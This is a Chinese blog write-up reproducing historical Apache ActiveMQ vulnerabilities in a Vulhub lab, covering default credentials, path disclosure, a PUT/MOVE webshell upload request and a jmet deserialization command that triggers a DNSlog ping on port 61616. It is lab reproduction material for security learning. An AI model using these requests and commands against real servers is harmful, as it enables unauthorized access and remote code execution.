【漏洞复现】Apache ActiveMQ相关漏洞复现

2022-03-03 16:27:53 浏览数 (1)

Hello,各位小伙伴大家好~

这里是一名白帽的成长史~

最近在攻防演习中用到ActiveMQ的漏洞进行getshell

今天就来复现一下它的一系列漏洞吧~

Part.1

环境准备

环境说明

Apache ActiveMQ是美国Apache软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。

该中间件存在包括任意文件上传、反序列化等一系列历史漏洞。

环境搭建

Vulhub是一个基于docker和docker-compose的漏洞环境集合,配合docker进行使用。

首先根据官网说明,安装好vulhub:

https://vulhub.org/

通过vulhub进行漏洞环境搭建:

查看容器端口映射关系,搭建成功:

Web服务端口为8161,尝试访问主页:

代码语言:javascript复制
http://192.168.3.129:8161

Part.2

漏洞复现

默认口令&未授权访问

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口。

admin和api都需要登录后才能访问,fileserver无需登录。

攻防演习中遇到的环境,admin是存在未授权访问的:

Vulhub搭建的环境则开启了登陆验证,访问:

代码语言:javascript复制
http://192.168.3.129:8161/admin/

但是可以通过默认口令进行登陆:

默认密码为admin/admin,登陆后可以看到版本为5.11.1

Api同样需要登陆验证,访问:

代码语言:javascript复制
http://192.168.3.129:8161/api/

通过admin/admin进行登陆:

Fileserver则无需登录即可访问:

物理路径泄漏漏洞

ActiveMQ默认开启PUT请求,当开启PUT时,访问不存在的目录,Response会返回相应的物理路径信息,例如:

代码语言:javascript复制
PUT /fileserver/a../

如果存在未授权或默认口令,以下页面同样可以获取到物理路径:

代码语言:javascript复制
http://192.168.3.129:8161/admin/test/systemProperties.jsp

PUT任意文件上传漏洞

fileserver是一个RESTful API接口,我们可以通过GET、PUT、MOVE等HTTP请求对其中存储的文件进行操作。

ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用,但可以在conf/jetty.xml中开启;在5.14.0版本以后,彻底删除了fileserver应用。

ActiveMQ默认开启PUT方法,当fileserver存在时我们可以上传jspwebshell:

代码语言:javascript复制
PUT /fileserver/shell.jsp HTTP/1.1
Host: 192.168.197.25:8161
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 26

this is jsp webshell code.

尝试上传一个txt文件,返回204则表示上传成功:

//失败则会返回404或者500

访问上传的1.txt,成功访问:

尝试通过PUT方法直接上传jsp,上传失败:

先将后缀名改为txt进行上传,成功:

通过MOVE方法,修改文件名后缀为jsp:

上传成功,但是访问会发现fileserver目录不解析jsp:

重新上传一个txt后缀的文件:

通过MOVE方法移动至admin目录,并修改后缀为jsp:

成功解析:

//当然也可以移动到api目录

反序列化漏洞

工具下载地址: https://github.com/matthiaskaiser/jmet

ActiveMQ默认对外开启61616端口,该端口为ActiveMQ消息队列端口。

通过61616端口能将构造好的,可执行命令的序列化对象,作为消息发送给服务器。

当管理员访问Web管理页面并读取消息时,则会触发该漏洞。

通过该漏洞尝试ping dnslog:

代码语言:javascript复制
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "ping xxxxx" -Yp ROME 192.168.3.129 61616

访问web管理页面,读取消息:

代码语言:javascript复制
http://192.168.3.129:8161/admin/browse.jsp?JMSDestination=event

点击查看这条消息即可触发命令执行:

此时DNSlog已收到请求:

命令执行成功~

Part.3

好啦,以上就是今天的全部内容了~

0 人点赞